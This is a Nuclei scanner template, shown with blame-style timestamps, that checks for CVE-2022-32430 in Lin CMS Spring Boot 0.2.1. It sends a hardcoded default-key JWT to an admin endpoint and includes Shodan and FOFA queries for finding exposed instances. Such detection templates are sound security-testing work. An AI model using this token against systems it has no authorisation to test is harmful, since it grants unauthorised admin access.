2024-04-03 05:08:11 +00:00
|
|
|
id: CVE-2022-32430
|
|
|
|
|
|
|
|
info:
|
2024-04-04 07:58:52 +00:00
|
|
|
name: Lin CMS Spring Boot - Default JWT Token
|
2024-04-03 05:08:11 +00:00
|
|
|
author: DhiyaneshDK
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.
|
|
|
|
reference:
|
|
|
|
- https://github.com/TaleLin/lin-cms-spring-boot
|
|
|
|
- https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277
|
2024-04-04 07:58:52 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32430
|
2024-04-03 05:08:11 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2022-32430
|
2024-04-08 11:34:33 +00:00
|
|
|
epss-score: 0.00227
|
|
|
|
epss-percentile: 0.60316
|
2024-04-03 05:08:11 +00:00
|
|
|
cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:*
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
|
|
|
vendor: talelin
|
|
|
|
product: lin-cms-spring-boot
|
2024-05-31 19:23:20 +00:00
|
|
|
shodan-query: http.html:"心上无垢,林间有风"
|
2024-06-07 10:04:29 +00:00
|
|
|
fofa-query: body="心上无垢,林间有风"
|
|
|
|
tags: cve,cve2022,lin-cms,auth-bypass,talelin
|
2024-04-03 05:08:11 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/cms/admin/group/all"
|
|
|
|
headers:
|
|
|
|
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '"id":'
|
|
|
|
- '"name":'
|
|
|
|
- '"level":'
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- 'application/json'
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '<html'
|
|
|
|
- '<body'
|
|
|
|
- '<script'
|
|
|
|
negative: true
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 4a0a0047304502205f7d564aa099edfc3799d3b6d86c19ddef728b5b2e9900d6d684d036b0854b28022100cbca190ef9e33d9e756b53391563d65e7625f176c6ce4c16c07755a11587f680:922c64590222798bb761d5b6d8e72950
|